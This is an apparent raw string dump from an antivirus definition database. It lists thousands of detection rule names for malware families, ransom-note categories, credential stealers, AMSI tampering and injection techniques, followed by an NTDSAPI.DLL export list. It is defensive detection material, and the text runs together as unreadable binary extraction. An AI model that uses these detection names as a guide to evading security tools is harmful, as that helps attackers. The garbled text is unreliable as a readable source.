AVA:Feature:C:400Lua:JSOB.FileSizeHSTR:JAVA:Feature:C:286BRUTE:VBS:Feature:M:56BRUTE:VBS:Feature:M:395BRUTE:JAMSI:Expert:Feature:58BRUTE:VBS:Feature:C:354HSTR:JAVA:Feature:M:108HSTR:JAVA:Feature:M:675HSTR:JAVA:Feature:C:66BRUTE:VBS:Feature:C:163HSTR:JAVA:Feature:M:515BRUTE:VBS:Feature:C:644SIGATTR:Java:PrivilegedActionException.getExceptionSIGATTR:Java:System.getPropertySCPT:HPDockStationFirmware.p1HSTR:JAVA:Feature:C:70HSTR:JAVA:Feature:M:640SIGATTR:Java:DataBuffer.setElemSIGATTR:Java:Math.absBRUTE:VBS:Feature:M:766HSTR:JAVA:Feature:M:685BRUTE:VBS:Feature:M:310HSTR:JAVA:Feature:M:308SCPT:GeneralityExploitStrRare.CSIGATTR:Java:Character.toUpperCaseHSTR:JAVA:Feature:C:312HSTR:JAVA:Feature:M:45SIGATTR:Java:Container.addBRUTE:VBS:Feature:C:312HSTR:JAVA:Feature:C:588SIGATTR:Java:Math.sqrtHSTR:JAVA:Feature:C:628BRUTE:VBS:Feature:C:682BRUTE:JAMSI:Feature:M:224SIGATTR:Java:Cipher.doFinalHSTR:JAVA:Feature:C:512HSTR:JAVA:Feature:C:437BRUTE:VBS:Feature:C:761BRUTE:VBS:Feature:M:445BRUTE:VBS:Feature:M:548SIGATTR:Java:Class.getMethodHSTR:JAVA:Feature:C:509SIGATTR:Java:HttpURLConnection.setDoOutputSIGATTR:Java:InetAddress.getLocalHostSIGATTR:Java:LinkedList.isEmptySIGATTR:Java:IOException.printStackTraceBRUTE:PDF:Feature:C:222HSTR:JAVA:Feature:M:641HSTR:JAVA:Feature:M:223SIGATTR:Java:Reflect_Method.invokeBRUTE:PDF:Feature:M:417HSTR:JAVA:Feature:C:84SIGATTR:Java:String.indexOfSIGATTR:Java:HashMap.removeSCPT:VBSForEachSIGATTR:Java:BigInteger.toByteArrayBRUTE:VBS:Feature:C:95HSTR:JAVA:Feature:C:252SIGATTR:Java:Class.toStringHSTR:JAVA:Feature:C:646BRUTE:VBS:Feature:M:711SIGATTR:Java:IOException.toStringExceptionExtBRUTE:VBS:Feature:C:118BRUTE:VBS:Feature:C:282SCPT:RansomNoteCat4_30SIGATTR:Java:Reflect_Field.setBRUTE:VBS:Feature:C:437SCRIPT:FlashExp_writebyteSCRIPT:Exploit:SWF/Netis.B-2HSTR:JAVA:Feature:C:38BRUTE:JAMSI:Feature:C:93SIGATTR:Java:String.formatHSTR:JAVA:Feature:C:551HSTR:JAVA:Feature:C:581ML:LUA:FileSizeLE400.AHSTR:JAVA:Feature:C:329SIGATTR:Java:SecurityManager.checkPermissionSIGATTR:Java:OutputStream.writeHSTR:JAVA:Feature:M:8HSTR:JAVA:Feature:M:684SIGATTR:Java:Method.invokeBRUTE:Exploit:Java/CVE-2008-5353.C3BRUTE:VBS:Feature:M:544SCPT:LNK/EvalAttrHSTR:JAVA:Feature:C:601SIGATTR:Java:Field.setHSTR:JAVA:Feature:C:165HSTR:JAVA:Feature:C:151BRUTE:VBS:Feature:C:91SCPT:RansomNoteCat4_51SIGATTR:Java:Class.forNameSIGATTR:Java:DataOutputStream.writeBRUTE:JAMSI:Feature:C:266SIGATTR:Java:Class.getClassLoaderBRUTE:JAMSI:Feature:M:278AGGR:AlreadyExistInstallerAGGR:GenericInstallerFileHSTR:JAVA:Feature:C:61SIGATTR:Java:Math.logHSTR:JAVA:Feature:M:18BRUTE:VBS:Feature:C:113SCPT:O97M/Trickbot.VAR4!MTBSCPT:TrojanDownloader:O97M/Zloader.STO3BRUTE:PDF:Feature:M:728BRUTE:VBS:Feature:M:528SIGATTR:Java:Graphics2D.drawHSTR:JAVA:Feature:M:402Exploit:Java/CVE-2013-1493.INITBRUTE:JAMSI:Feature:C:79AGGR:ExcelSiorType.BSIGATTR:Java:ColorConvertOp.filterSIGATTR:Java:Integer.toStringLua:IsEnterpriseBRUTE:JAMSI:Feature:C:145SIGATTR:Java:Method.getParameterTypesHSTR:JAVA:Feature:C:244BRUTE:PDF:Feature:M:105ExcelSiorType.CHSTR:JAVA:Feature:M:243SCPT:PDF.HasImageSCRIPT:Psmarshal.AHSTR:JAVA:Feature:C:373BRUTE:VBS:Feature:C:227BRUTE:PDF:Feature:C:702SCPT:JS/BASE64.function.AAGGR:Lua:JarManifestSizeLT150BRUTE:VBS:Feature:C:576SCPT:JS/ReturnHSTR:JAVA:Feature:M:178BRUTE:JAMSI:Feature:C:41BRUTE:JAMSI:Feature:M:235Lua:FileInZipBRUTE:PDF:Feature:M:196BRUTE:VBS:Feature:C:577BRUTE:PDF:Feature:M:353BRUTE:JAMSI:Feature:C:133BRUTE:PDF:Feature:M:479BRUTE:VBS:Feature:M:84BRUTE:VBS:Feature:M:725BRUTE:VBS:Feature:C:714HSTR:JAVA:Feature:M:174SCRIPT:base64HSTR:JAVA:Feature:C:59SCPT:RansomNoteCat4_48Lua:FlagsForTechniqueTracking.ASIGATTR:Java:Math.sinSCPT:Linux/Trojan.mal_attr_ChmodToExecHSTR:JAVA:Feature:M:589HSTR:JAVA:Feature:C:130BRUTE:VBS:Feature:C:272HSTR:JAVA:Feature:C:74BRUTE:JAMSI:Feature:M:225BRUTE:VBS:Feature:M:458HSTR:JAVA:Feature:M:122SIGATTR:Java:Expression.getValueSIGATTR:Java:Thread.getContextClassLoaderHSTR:JAVA:Feature:C:404BRUTE:VBS:Feature:C:477HSTR:JAVA:Feature:C:500SIGATTR:Java:Integer.intValueHSTR:Trojan:Java/ZKMHSTR:JAVA:Feature:C:228SIGATTR:Java:ICC_Profile.getInstanceBRUTE:PDF:Feature:M:160BRUTE:VBS:Feature:C:540BRUTE:VBS:Feature:M:536HSTR:JAVA:Feature:C:502BRUTE:VBS:Feature:C:527BRUTE:JAMSI:Feature:C:1SIGATTR:Java:Socket.getInputStreamBRUTE:VBS:Feature:C:183BRUTE:PDF:Feature:C:57SIGATTR:Java:LinkedList.addBRUTE:VBS:Feature:C:292HSTR:JAVA:Feature:M:287HSTR:JAVA:Feature:M:220SCPT:TrojanDownloader:O97M/Qakbot.PJI6!MTBBRUTE:PDF:Feature:M:908BRUTE:VBS:Feature:M:817HSTR:JAVA:Feature:C:303BRUTE:PDF:Feature:M:153BRUTE:LNK:Expert:Feature:93SIGATTR:Java:Method.getModifiersSIGATTR:Java:Long.longValueBRUTE:PDF:Feature:M:162SCPT:VBSCCopyrightSCPT:JS/copyrightSCPT:GeneralityExploitStrRare.VSCPT:ClnWordsCat1_2BRUTE:VBS:Feature:M:431HSTR:JAVA:Feature:C:446BRUTE:VBS:Feature:M:102AGGR:Lua:JarMoreFilesInMetaInfBRUTE:PDF:Feature:C:154BRUTE:VBS:Feature:M:69BRUTE:PDF:Feature:M:648HSTR:JAVA:Feature:C:235SCPT:JS/licenseSCPT:VBSCLicenseSCPT:ClnWordsCat2_47SCRIPT:StringCmdExeBRUTE:VBS:Feature:M:212SCPT:RansomNoteCat4_34HSTR:JAVA:Feature:M:57BRUTE:PDF:Feature:M:810SCPT:RansomNoteCat4_2SCPT:RansomNoteCat1_3HSTR:JAVA:Feature:C:310BRUTE:JAMSI:Feature:M:109BRUTE:VBS:Feature:C:567HSTR:JAVA:Feature:M:411HSTR:JAVA:Feature:C:330BRUTE:VBS:Feature:M:546SIGATTR:Java:ByteBuffer.allocateSIGATTR:Java:Object.hashCodeBRUTE:VBS:Feature:C:518SIGATTR:Java:Double.parseDoubleSIGATTR:Java:LinkedList.iteratorSCPT:RansomNoteCat2_3HSTR:JAVA:Feature:C:63BRUTE:JAMSI:Feature:C:155SIGATTR:Java:Field.getHSTR:JAVA:Feature:M:508BRUTE:VBS:Feature:M:642HSTR:JAVA:Feature:C:237SIGATTR:Java:ByteBuffer.putSIGATTR:Java:PrintStream.printBRUTE:JAMSI:Feature:M:91HSTR:JAVA:Feature:C:24SCPT:RansomNoteCat2_14HSTR:JAVA:Feature:M:32HSTR:JAVA:Feature:C:85HSTR:JAVA:Feature:M:313BRUTE:VBS:Feature:C:368Lua:FileBaseFolderInCdriveHSTR:JAVA:Feature:M:352SIGATTR:Java:Reflect_Field.getHSTR:JAVA:Feature:C:291HSTR:JAVA:Feature:C:570HSTR:JAVA:Feature:C:208Exception:Masquerading.EABRUTE:VBS:Feature:M:204HSTR:JAVA:Feature:C:297BRUTE:JAMSI:Feature:C:49SCRIPT:FlashExp_blowfishSIGATTR:Java:Statement.executeSCPT:hiddenBRUTE:LNK:Expert:Feature:239SIGATTR:Java:Math.minBRUTE:JAMSI:Feature:C:134HSTR:JAVA:Feature:C:138BRUTE:JAMSI:Expert:Feature:63HSTR:JAVA:Feature:C:556SCPT:Phish:PHP/Loader.GGSIGATTR:Java:Character.isWhitespaceBRUTE:VBS:Feature:M:513BRUTE:JAMSI:Feature:C:234HSTR:JAVA:Feature:M:670SIGATTR:Java:WritableRaster.getDataBufferSIGATTR:Java:Object.notifyHSTR:JAVA:Feature:M:458BRUTE:VBS:Feature:C:116BRUTE:VBS:Feature:C:156ML:LUA:FileSizeLE5000.AHSTR:JAVA:Feature:C:183BRUTE:VBS:Feature:C:248BRUTE:LNK:Expert:Feature:28BRUTE:VBS:Feature:C:347BRUTE:VBS:Feature:C:346HSTR:JAVA:Feature:M:660HSTR:JAVA:Feature:M:46HSTR:JAVA:Feature:C:438SIGATTR:Java:Method.getNameBRUTE:Python/Leivion.B.LenHSTR:JAVA:Feature:M:124HSTR:JAVA:Feature:C:266BRUTE:PDF:Feature:C:555HSTR:JAVA:Feature:C:443ALF:AGGR:Vampa:99!mlSIGATTR:Java:FileOutputStream.writeBRUTE:VBS:Feature:M:677BRUTE:VBS:Feature:C:665HSTR:JAVA:Feature:C:64BRUTE:JAMSI:Feature:C:258HSTR:JAVA:Feature:C:345HSTR:JAVA:Feature:M:595BRUTE:VBS:Feature:C:209SCPT:Phish:PHP/Download.GGHSTR:JAVA:Feature:C:421SCPT:TrojanDownloader:O97M/Obfuse.PKV6!MTBSCPT:RansomNoteCat4_32BRUTE:VBS:Feature:C:580BRUTE:VBS:Feature:C:391BRUTE:VBS:Feature:M:685HSTR:JAVA:Feature:M:106BRUTE:VBS:Feature:C:441HSTR:JAVA:Feature:M:501BRUTE:PDF:Feature:C:305SIGATTR:Java:Socket.closeBRUTE:JAMSI:Feature:C:97SIGATTR:Java:File.lengthSIGATTR:Java:URLEncoder.encodeHSTR:JAVA:Feature:M:186BRUTE:LNK:Expert:Feature:109SIGATTR:Java:StringTokenizer.hasMoreTokensBRUTE:PDF:Feature:C:299HSTR:JAVA:Feature:C:466HSTR:JAVA:Feature:M:315SCPT:RansomNoteCat4_10HSTR:JAVA:Feature:C:197SCPT:RansomNoteCat2_9ML:LUA:FileSizeLE1000.ABRUTE:VBS:Feature:C:488HSTR:JAVA:Feature:M:69BRUTE:VBS:Feature:M:22ML:LUA:FileSizeLE2000.ABRUTE:VBS:Feature:C:708BRUTE:VBS:Feature:M:259SIGATTR:Java:Class.getConstructorSCPT:AutoItApi_IsArrayHSTR:JAVA:Feature:M:353HSTR:JAVA:Feature:M:209BRUTE:LNK:Expert:Feature:42BRUTE:VBS:Feature:C:311BRUTE:JAMSI:FuncN:13SIGATTR:Java:String.trimBRUTE:LNK:Expert:Feature:30SCPT:LNK/httpHSTR:JAVA:Feature:M:211BRUTE:PDF:Feature:M:431BRUTE:PDF:Feature:C:747HSTR:JAVA:Feature:M:249BRUTE:LNK:Expert:Feature:140BRUTE:VBS:Feature:C:18SIGATTR:Java:String.getBytesML:LUA:FileSizeLE80000.AHSTR:JAVA:Feature:M:27HSTR:JAVA:Feature:C:49SCPT:AmsiPatch.A4HSTR:JAVA:Feature:C:691HSTR:JAVA:Feature:C:540BRUTE:VBS:Feature:M:363SCRIPT:VBSRunAGGR:Lua:JarClassFilesInsideGE10BRUTE:VBS:Feature:C:142BRUTE:PDF:Feature:M:723HSTR:Zkm_DecoderBRUTE:VBS:Feature:C:646BRUTE:PDF:Feature:C:46BRUTE:JAMSI:Feature:C:187SIGATTR:Java:Class.getResourceBRUTE:VBS:Feature:C:221BRUTE:VBS:Feature:M:73SIGATTR:Java:System.exitHSTR:JAVA:Feature:M:322SIGATTR:Java:Throwable.printStackTraceBRUTE:JAMSI:Feature:C:10HSTR:JAVA:Feature:C:655BRUTE:JAMSI:Feature:M:46SCRIPT:StringBase64.ABRUTE:JAMSI:Feature:C:190SIGATTR:Java:Logger.getLoggerBRUTE:PDF:Feature:C:814HSTR:JAVA:Feature:M:11HSTR:JAVA:Feature:C:477SIGATTR:Java:Class.isArraySCPT:VBSBase64SIGATTR:Java:ByteArrayOutputStream.toByteArrayBRUTE:LNK:Expert:Feature:183ML:LUA:FileSizeLE40000.ABRUTE:PDF:Feature:C:790BRUTE:VBS:Feature:C:339SCPT:AutoItApi_StringBRUTE:PDF:Feature:C:145BRUTE:VBS:Feature:C:302HSTR:JAVA:Feature:C:575BRUTE:VBS:Feature:C:808BRUTE:VBS:Feature:M:281HSTR:JAVA:Feature:C:279BRUTE:VBS:Feature:C:78SIGATTR:Java:File.createNewFileSIGATTR:Java:String.compareToSIGATTR:Java:File.getParentFileSLF:Context/NonPeExtractedFileInArchive.B!jarLua:NonPeExtractedFileInArchive.BHSTR:JAVA:Feature:C:140BRUTE:PDF:Feature:M:553HSTR:JAVA:Feature:M:621HSTR:JAVA:Feature:C:362HSTR:JAVA:Feature:M:563HSTR:JAVA:Feature:M:254ALF:AGGR:Vampa:90!mlSIGATTR:Java:File.getPathALF:AGGR:Vampa:80!mlSIGATTR:Java:Arrays.fillHSTR:JAVA:Feature:M:111BRUTE:JAMSI:Feature:C:68HSTR:JAVA:Feature:C:654HSTR:JAVA:Feature:M:527HSTR:JAVA:Feature:M:555BRUTE:VBS:Feature:C:251SIGATTR:Java:DataOutputStream.writeIntHSTR:JAVA:Feature:M:121BRUTE:VBS:Feature:M:742SIGATTR:Java:Graphics.drawImageSIGATTR:Java:File.deleteSIGATTR:Java:Class.isPrimitiveHSTR:JAVA:Feature:M:377Lua:FileSizeLT2000SIGATTR:Java:InetAddress.getAddressBRUTE:VBS:Feature:M:151SCPT:ClnWordsCat2_13HSTR:JAVA:Feature:C:671BRUTE:PDF:Feature:M:444BRUTE:VBS:Feature:C:424Trojan:O97M/Donoff.Y4BRUTE:VBS:Feature:C:86BRUTE:PDF:Feature:M:632VirTool:Java/Obfuscator.AHSTR:JAVA:Feature:M:553BRUTE:PDF:Feature:M:140BRUTE:PDF:Feature:M:42SIGATTR:Java:Arrays.asListSIGATTR:Java:StackTraceElement.getMethodNameSIGATTR:Java:BufferedOutputStream.writeBRUTE:VBS:Feature:M:495HSTR:JAVA:Feature:M:261SIGATTR:Java:Class.getDeclaredFieldsLua:IsE5MachineSCRIPT:StringHttpsSIGATTR:Java:Float.floatValueBRUTE:LNK:Expert:Feature:29HSTR:JAVA:Feature:M:572SIGATTR:Java:Array.newInstanceSCPT:RansomNoteCat3_33BRUTE:PDF:Feature:C:351SIGATTR:Java:Object.toStringBRUTE:JAMSI:Feature:M:101BRUTE:VBS:Feature:C:403BRUTE:VBS:Feature:C:72HSTR:JAVA:Feature:M:250HSTR:JAVA:Feature:C:105BRUTE:VBS:Feature:C:63BRUTE:JAMSI:Feature:C:71HSTR:JAVA:Feature:C:215HSTR:JAVA:Feature:M:73SCPT:AutoItApi_SleepSCRIPT:StringDisplayName.ABRUTE:VBS:Feature:M:564BRUTE:VBS:Feature:C:250BRUTE:VBS:Feature:M:353SIGATTR:Java:File.getParentHSTR:JAVA:Feature:M:585SCPT:RansomNoteCat4_40BRUTE:VBS:Feature:M:799HSTR:JAVA:Feature:M:229SCPT:TrojanDownloader:O97M/Zloader.STO8BRUTE:VBS:Feature:C:49HSTR:JAVA:Feature:M:292SIGATTR:Java:File.mkdirsSIGATTR:Java:File.isFileSCPT:Backdoor:Php/Dirtelti.GG15SIGATTR:Java:OutputStream.flushBRUTE:VBS:Feature:C:360BRUTE:JAMSI:Feature:C:299BRUTE:Exploit:Java/CVE-2008-5353.C1SIGATTR:Java:HashMap.putBRUTE:JAMSI:Feature:C:186SCRIPT:PHP/GetEnv!MTBSIGATTR:Java:StringBuffer.reverseBRUTE:VBS:Feature:C:335BRUTE:VBS:Feature:M:158ML:LUA:FileSizeLE10000.AAGGR:Lua:JarClassFilesInsideGE50SIGATTR:Java:Exception.getMessageSIGATTR:Java:File.isDirectoryHSTR:JAVA:Feature:C:285SCPT:RansomNoteCat4_21SIGATTR:Java:PrintWriter.writeSCRIPT:CMDStringBRUTE:LNK:Expert:Feature:53BRUTE:VBS:Feature:C:519HSTR:JAVA:Feature:C:490HSTR:JAVA:Feature:C:129BRUTE:LNK:Expert:Feature:83SCPT:Backdoor:ASP/Dirtelti.K4!MTBSCRIPT:AMSITest2SCPT:Backdoor:ASP/Dirtelti.G6!MTBBRUTE:PDF:Feature:C:756BRUTE:LNK:Expert:Feature:136SCPT:LNK/FunAttrSIGATTR:Java:Statement.getMethodNameHSTR:JAVA:Feature:C:434HSTR:JAVA:Feature:C:380BRUTE:JAMSI:Feature:C:203BRUTE:VBS:Feature:M:345SCPT:Phish:PHP/Created.GGHSTR:JAVA:Feature:C:409SIGATTR:Java:StackTraceElement.getClassNameBRUTE:LNK:Expert:Feature:208BRUTE:JAMSI:Feature:C:243SIGATTR:Java:Math.randomSIGATTR:Java:Class.newInstanceSCPT:RansomNoteCat4_15BRUTE:VBS:Feature:C:338BRUTE:VBS:Feature:C:337HSTR:JAVA:Feature:M:332BRUTE:VBS:Feature:C:123 8 P e z !\"#$%&'()*+,-./0123456789 :;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_ NTDSAPI.DLL DsCrackSpn2A DsCrackSpn2W DsCrackSpn3W DsLogEntry DsaopBind DsaopBindWithCred DsaopBindWithSpn DsaopExecuteScript DsaopPrepareScript DsaopUnBind DsAddSidHistoryA DsAddSidHistoryW DsBindA DsBindW DsBindWithCredA DsBindWithCredW DsBindWithSpnA DsBindWithSpnW DsClientMakeSpnForTargetServerA DsClientMakeSpnForTargetServerW DsCrackNamesA DsCrackNamesW DsCrackSpnA DsCrackSpnW DsCrackUnquotedMangledRdnA DsCrackUnquotedMangledRdnW DsFreeDomainControllerInfoA DsFreeDomainControllerInfoW DsFreeNameResultA DsFreeNameResultW DsFreePasswordCredentials DsFreeSchemaGuidMapA DsFreeSchemaGuidMapW DsFreeSpnArrayA DsFreeSpnArrayW DsGetDomainControllerInfoA DsGetDomainControllerInfoW DsGetRdnW DsGetSpnA DsGetSpnW DsInheritSecurityIdentityA DsInheritSecurityIdentityW DsIsMangledDnA DsIsMangledDnW DsIsMangledRdnValueA DsIsMangledRdnValueW DsListDomainsInSiteA DsListDomainsInSiteW DsListInfoForServerA DsListInfoForServerW DsListRolesA DsListRolesW DsListServersForDomainInSiteA DsListServersForDomainInSiteW DsListServersInSiteA DsListServersInSiteW DsListSitesA DsListSitesW DsMakePasswordCredentialsA DsMakePasswordCredentialsW DsMakeSpnA DsMakeSpnW DsMapSchemaGuidsA DsMapSchemaGuidsW DsQuoteRdnValueA DsQuoteRdnValueW DsRemoveDsDomainA DsRemoveDsDomainW DsRemoveDsServerA DsRemoveDsServerW DsReplicaAddA DsReplicaAddW DsReplicaConsistencyCheck DsReplicaDelA DsReplicaDelW DsReplicaFreeInfo DsReplicaGetInfo2W DsReplicaGetInfoW DsReplicaModifyA DsReplicaModifyW DsReplicaSyncA DsReplicaSyncAllA DsReplicaSyncAllW DsReplicaSyncW DsReplicaUpdateRefsA DsReplicaUpdateRefsW DsReplicaVerifyObjectsA DsReplicaVerifyObjectsW DsServerRegisterSpnA DsServerRegisterSpnW DsUnBindA DsUnBindW DsUnquoteRdnValueA DsUnquoteRdnValueW DsWriteAccountSpnA DsWriteAccountSpnW \tNTDSAPI.DLLDsCrackSpn2ADsCrackSpn2WDsCrackSpn3WDsLogEntryDsaopBindDsaopBindWithCredDsaopBindWithSpnDsaopExecuteScriptDsaopPrepareScriptDsaopUnBindDsAddSidHistoryADsAddSidHistoryWDsBindADsBindWDsBindWithCredADsBindWithCredWDsBindWithSpnADsBindWithSpnWDsClientMakeSpnForTargetServerADsClientMakeSpnForTargetServerWDsCrackNamesADsCrackNamesWDsCrackSpnADsCrackSpnWDsCrackUnquotedMangledRdnADsCrackUnquotedMangledRdnWDsFreeDomainControllerInfoADsFreeDomainControllerInfoWDsFreeNameResultADsFreeNameResultWDsFreePasswordCredentialsDsFreeSchemaGuidMapADsFreeSchemaGuidMapWDsFreeSpnArrayADsFreeSpnArrayWDsGetDomainControllerInfoADsGetDomainControllerInfoWDsGetRdnWDsGetSpnADsGetSpnWDsInheritSecurityIdentityADsInheritSecurityIdentityWDsIsMangledDnADsIsMangledDnWDsIsMangledRdnValueADsIsMangledRdnValueWDsListDomainsInSiteADsListDomainsInSiteWDsListInfoForServerADsListInfoForServerWDsListRolesADsListRolesWDsListServersForDomainInSiteADsListServersForDomainInSiteWDsListServersInSiteADsListServersInSiteWDsListSitesADsListSitesWDsMakePasswordCredentialsADsMakePasswordCredentialsWDsMakeSpnADsMakeSpnWDsMapSchemaGuidsADsMapSchemaGuidsWDsQuoteRdnValueADsQuoteRdnValueWDsRemoveDsDomainADsRemoveDsDomainWDsRemoveDsServerADsRemoveDsServerWDsReplicaAddADsReplicaAddWDsReplicaConsistencyCheckDsReplicaDelADsReplicaDelWDsReplicaFreeInfoDsReplicaGetInfo2WDsReplicaGetInfoWDsReplicaModifyADsReplicaModifyWDsReplicaSyncADsReplicaSyncAllADsReplicaSyncAllWDsReplicaSyncWDsReplicaUpdateRefsADsReplicaUpdateRefsWDsReplicaVerifyObjectsADsReplicaVerifyObjectsWDsServerRegisterSpnADsServerRegisterSpnWDsUnBindADsUnBindWDsUnquoteRdnValueADsUnquoteRdnValueWDsWriteAccountSpnADsWriteAccountSpnWV 1c4b325628ee3 \t%WINDIR% 25b385ad639b 25b385ad639bIncludesResearchData InjectQueueUserAPC 25b3b8b261e4 25b3b8b261e4IncludesResearchData InjectRemoteThread !#TEL:TrojanDropper:O97M/Kitten.A u!P!#TEL:TrojanDropper:O97M/Kitten.A MpInternal_Lua:ThrottleAttribute.75000 'MpInternal_Lua:ThrottleAttribute.75000 M!#ALF:PWS:MSIL/Dcstl M!#ALF:PWS:MSIL/Dcstl~*#% M!#ALF:PWS:MSIL/Dcstl~*5 M!#ALF:PWS:MSIL/Dcstl~*~ M!#ALF:PWS:MSIL/Dcstl~* aM!#ALF:PWS:MSIL/Dcstl aM!#ALF:PWS:MSIL/Dcstl~* -Xm9Dj M!#ALF:PWS:MSIL/Dcstl~+ eM!#ALF:PWS:MSIL/Grmasi eM!#ALF:PWS:MSIL/Grmasi~,mE nR=maM!#ALF:PWS:MSIL/Echelon nR=maM!#ALF:PWS:MSIL/Echelon~, M!#ALF:PWS:MSIL/Echelon M!#ALF:PWS:MSIL/Echelon~, M!#ALF:PWS:MSIL/Stealer M!#ALF:PWS:MSIL/Stealer~-Fr M!#ALF:Worm:MSIL/Rowmuny M!#ALF:Worm:MSIL/Rowmuny~- M!#ALF:PWS:MSIL/Bahmajip M!#ALF:PWS:MSIL/Bahmajip~.5 M!#ALF:Trojan:MSIL/Wizrem M!#ALF:Trojan:MSIL/Wizrem~. sM!#ALF:VirTool:MSIL/Subti sM!#ALF:VirTool:MSIL/Subti~. M!#ALF:Worm:Win32/AutoRun M!#ALF:Worm:Win32/AutoRun~/\\ M!#ALF:Trojan:Win32/Tiggre M!#ALF:Trojan:Win32/Tiggre~/%G M!#ALF:Trojan:Win32/Swrort M!#ALF:Trojan:Win32/Swrort~/B6xe M!#ALF:Trojan:Win32/Sefnit M!#ALF:Trojan:Win32/Sefnit~/U M!#ALF:Trojan:Win32/Tiggre~/[Q M!#ALF:PWS:MSIL/HtmStealer M!#ALF:PWS:MSIL/HtmStealer~/s M!#ALF:Trojan:Win32/Masson M!#ALF:Trojan:Win32/Masson~/ M!#ALF:PWS:MSIL/HtmStealer~/ M!#ALF:VirTool:MSIL/Deimos~/ M!#ALF:Trojan:Win32/Tiggre~/ lM!#ALF:Trojan:Win32/Tiggre lM!#ALF:Trojan:Win32/Tiggre~0L M!#ALF:Trojan:Win32/Dynamer M!#ALF:Trojan:Win32/Dynamer~0e M!#ALF:Backdoor:MSIL/Harsyn M!#ALF:Backdoor:MSIL/Harsyn~0n` *_YKF (M!#ALF:Ransom:Win32/Genasom (M!#ALF:Ransom:Win32/Genasom~0 M!#ALF:VirTool:Win32/Bymsei M!#ALF:VirTool:Win32/Bymsei~0 M!#ALF:Backdoor:MSIL/Draliz M!#ALF:Backdoor:MSIL/Draliz~0 shHBM!#ALF:Trojan:Win32/Bluteal shHBM!#ALF:Trojan:Win32/Bluteal~0 QUM!#ALF:VirTool:MSIL/Viemlod QUM!#ALF:VirTool:MSIL/Viemlod~0 M!#ALF:Trojan:Win32/Iepatch M!#ALF:Trojan:Win32/Iepatch~1` 7\\!fla^ M!#ALF:VirTool:MSIL/Injector M!#ALF:VirTool:MSIL/Injector~1e8= M!#ALF:VirTool:MSIL/Injector~1} M!#ALF:VirTool:MSIL/Injector~1 M!#ALF:Exploit:Win32/RpcDcom M!#ALF:Exploit:Win32/RpcDcom~1 M!#ALF:Exploit:Win32/RpcDcom~24 ;M!#ALF:TrojanSpy:MSIL/Stelega ;M!#ALF:TrojanSpy:MSIL/Stelega~26 M!#ALF:VirTool:MSIL/Reticular M!#ALF:VirTool:MSIL/Reticular~2Muk M!#ALF:HackTool:Win32/AutoKMS M!#ALF:HackTool:Win32/AutoKMS~2 M!#ALF:VirTool:MSIL/SharpKatz M!#ALF:VirTool:MSIL/SharpKatz~2 ;^s 'M!#ALF:VirTool:MSIL/SharpKatz ;^s 'M!#ALF:VirTool:MSIL/SharpKatz~2 C7z=if M!#ALF:Backdoor:Win32/Yonsole M!#ALF:Backdoor:Win32/Yonsole~2 ,MM!#ALF:Backdoor:Win32/LimeRat ,MM!#ALF:Backdoor:Win32/LimeRat~2 M!#ALF:Backdoor:Win32/LimeRat M!#ALF:Backdoor:Win32/LimeRat~3' M!#ALF:VirTool:MSIL/Obfuscator M!#ALF:VirTool:MSIL/Obfuscator~3* M!#ALF:Exploit:HTML/IframeExec M!#ALF:Exploit:HTML/IframeExec~33 oMM!#ALF:VirTool:MSIL/Obfuscator oMM!#ALF:VirTool:MSIL/Obfuscator~3V [!ol M!#ALF:Trojan:MSIL/CryptInject M!#ALF:Trojan:MSIL/CryptInject~3uQ M!#ALF:VirTool:MSIL/Obfuscator~3 M!#ALF:Trojan:Win32/AmsiTamper M!#ALF:Trojan:Win32/AmsiTamper~3 M!#ALF:Trojan:MSIL/DllInjector M!#ALF:Trojan:MSIL/DllInjector~3 M!#ALF:Backdoor:MSIL/Peekserve M!#ALF:Backdoor:MSIL/Peekserve~4 M!#ALF:Trojan:Win32/EmotetCrypt M!#ALF:Trojan:Win32/EmotetCrypt~4?& >M!#ALF:VirTool:Win32/Obfuscator >M!#ALF:VirTool:Win32/Obfuscator~4F M!#ALF:Trojan:Win32/Meterpreter M!#ALF:Trojan:Win32/Meterpreter~4I7 M!#ALF:Trojan:Win32/Meterpreter~4^ M!#ALF:Trojan:Win32/EmotetCrypt~4 M!#ALF:Trojan:Win64/Meterpreter M!#ALF:Trojan:Win64/Meterpreter~4 M!#ALF:Trojan:Win32/AgentBypass M!#ALF:Trojan:Win32/AgentBypass~4 M!#ALF:Trojan:Win32/Meterpreter~4 (M!#ALF:Trojan:Win32/Meterpreter (M!#ALF:Trojan:Win32/Meterpreter~4 +M!#ALF:Ransom:MSIL/JigsawLocker +M!#ALF:Ransom:MSIL/JigsawLocker~5 =M!#ALF:Trojan:MSIL/CryptInjector =M!#ALF:Trojan:MSIL/CryptInjector~5j M!#ALF:Trojan:MSIL/CryptInjector M!#ALF:Trojan:MSIL/CryptInjector~5u M!#ALF:Trojan:MSIL/CryptInjector~5}\t M!#ALF:Trojan:MSIL/CryptInjector~5 M!#ALF:Trojan:MSIL/CryptInjector~6 2BM!#ALF:TrojanDropper:Win32/Floxif 2BM!#ALF:TrojanDropper:Win32/Floxif~9 M!#ALF:TrojanDownloader:Win32/FakeIE M!#ALF:TrojanDownloader:Win32/FakeIE~:t5# M!#ALF:Program:Win32/VulnInsydeDriver M!#ALF:Program:Win32/VulnInsydeDriver~: iM!#ALF:BrowserModifier:Win32/Foxiebro iM!#ALF:BrowserModifier:Win32/Foxiebro~: > 9M!#ALF:BrowserModifier:Win32/Foxiebro > 9M!#ALF:BrowserModifier:Win32/Foxiebro~: uCM!#ALF:Program:Win32/VulnInsydeDriver uCM!#ALF:Program:Win32/VulnInsydeDriver~: *@+`d M!#ALF:Program:Win32/VulnInsydeDriver~<)z M!#ALF:TrojanDownloader:Win32/Gendwnurl M!#ALF:TrojanDownloader:Win32/Gendwnurlz BmEopMonitoredProcessest 6(784),%temp%\\33b84246-f945-11e6-bc64-92361f002671.exez CloudCallASEP Infrastructure_CheckASEPandCallCloud %Infrastructure_CheckASEPandCallCloud a5b3c152874a ]EF@ CloudCallASEPTest !#TEL:Lua:UserInitiatedOnDemandScan GetScanSource SCANSOURCE_ONDEMAND !#TEL:Lua:BM_UNKNOWN_FILE !#TEL:Lua:BM_UNKNOWN_FILEObMpAttributes SCANREASON_ONFIRSTREAD BM_UNKNOWN_FILE Lua:HdrDdVal !#Lua:ASRContextEXEDoubleExtension fd960b4a-d8d7-4590-a6ce-0219df56a135 %fd960b4a-d8d7-4590-a6ce-0219df56a135 Lua:ASRContextEXEDoubleExtension !Lua:ASRContextEXEDoubleExtension c6b3db3234ed 